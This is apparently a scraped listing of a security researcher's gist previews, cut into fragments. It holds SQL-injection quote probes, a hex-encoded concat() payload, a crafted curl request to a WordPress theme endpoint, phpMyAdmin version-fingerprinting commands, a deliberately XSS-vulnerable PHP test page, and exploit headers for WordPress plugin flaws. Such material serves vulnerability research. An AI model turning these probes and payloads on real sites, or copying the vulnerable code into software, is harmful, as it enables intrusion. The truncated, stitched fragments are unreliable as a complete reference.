Below, by error it means some error appears or shows some different behaviour
\
// some error or a different behaviour
\\
// no error
'
// error
''
// no error, it is a single quote written twice
'''
// error
''''
// no error
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
https://www.facebook.com/groups/2204685680/permalink/10159527798470681/ | |
--> | |
<form action="" method="POST"> | |
<input type="text" name="owner" required="true"><br> | |
<input type="submit"> | |
</form> | |
<?php |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
concat (0x3C7374796C653E0D0A2376616C73207B0D0A2020666F6E742D66616D696C793A2022547265627563686574204D53222C20417269616C2C2048656C7665746963612C2073616E732D73657269663B0D0A2020626F726465722D636F6C6C617073653A20636F6C6C617073653B0D0A202077696474683A20313030253B0D0A7D0D0A0D0A2376616C732074642C202376616C73207468207B0D0A2020626F726465723A2032707820736F6C696420234637393430463B0D0A202070616464696E673A203870783B0D0A20636F6C6F723A7472616E73706172656E743B0D0A206261636B67726F756E643A0D0A2020726570656174696E672D6C696E6561722D6772616469656E7428746F2072696768742C0D0A2020202072656420202020302020203163682C0D0A20202020626C7565202020316368203263682C0D0A20202020677265656E2020326368203363682C0D0A20202020707572706C652033636820346368293B0D0A202D7765626B69742D6261636B67726F756E642D636C69703A746578743B0D0A206261636B67726F756E642D636C69703A746578743B0D0A7D0D0A0D0A2376616C732074723A6E74682D6368696C64286576656E297B6261636B67726F756E642D636F6C6F723A20236632663266323B7D0D0A0D0A2376616C732074723A686F766572207B6261636B67726F756E642D636F6C6F |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://www.facebook.com/groups/2204685680/permalink/10159646528425681/ | |
# https://pastebin.com/KKZGafGr | |
curl -i -s -k -X $'POST' \ | |
-H $'Host: example.com' -H $'Connection: close' -H $'Accept: text/html, */*; q=0.01' -H $'Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7,es;q=0.6,de;q=0.5' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'X-Requested-With: XMLHttpRequest' -H $'Referer: https://example.com/author/scauto/' -H $'Referrer-Policy: no-referrer-when-downgrade' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36' -H $'Content-Length: 187' \ | |
--data-binary $'offset=0&category=0&author=255&tag=&date=0&searchQ=&searchA=0&limit=99999&idnotin=618814%2C618824%2C618825%2C618913%2C618917%2C618920%2C618921%2C618924%2C618997%2C618998%2C618999%2C619001' \ | |
$'https://example.com/wp-content/themes/gridlocked/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -siLk https://127.0.0.1:8443/phpmyadmin | grep -o -P '(?<=PMA_VERSION:").*(?=",auth_type)' | |
curl -siLk https://127.0.0.1:8443/phpmyadmin/doc/html/index.html | grep -o -P '(?<=phpMyAdmin ).*(?= Documentation)' | |
curl -siLk https://127.0.0.1:8443/phpmyadmin/docs/html/index.html | grep -o -P '(?<=phpMyAdmin ).*(?= Documentation)' | |
curl -siLk https://127.0.0.1:8443/phpmyadmin/Documentation.html | grep -o -P '(?<=phpMyAdmin ).*(?= - Documentation)' |
Exploit Title | WordPress Plugin Embed Swagger 1.0.0 - Reflected Cross-Site Scripting |
Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
Date | January 21, 2022 |
Plugin Link | Embed Swagger |
Version | 1.0.0 (Latest) |
Tested on | Wordpress 5.8.3 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// For testing XSS is various status codes | |
http_response_code($_GET['rCode']); // User controlled response code | |
echo $_GET['payload']; // User input reflected as it is | |
?> |
Exploit Title | WordPress Plugin WP Statistics <= 13.1.5 - Multiple Unauthenticated SQL Injection vulnerabilities |
Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
Date | February 13, 2022 |
Plugin Link | WP-Statistics |
Plugin Active Installations | 600,000+ |
Version | 13.1.5 (Latest) |
Exploit Title | WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting |
Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
Date | February 13, 2022 |
Plugin Link | WP-Statistics |
Plugin Active Installations | 600,000+ |
Version | 13.1.5 (Latest) |
Exploit Title | WordPress Plugin WP Statistics >= 13.1.5 - Unauthenticated Stored Cross-Site Scripting |
Exploit Author | Muhammad Zeeshan (Xib3rR4dAr) |
Date | February 13, 2022 |
Plugin Link | WP-Statistics |
Plugin Active Installations | 600,000+ |
Version | 13.1.5 (Latest) |
OlderNewer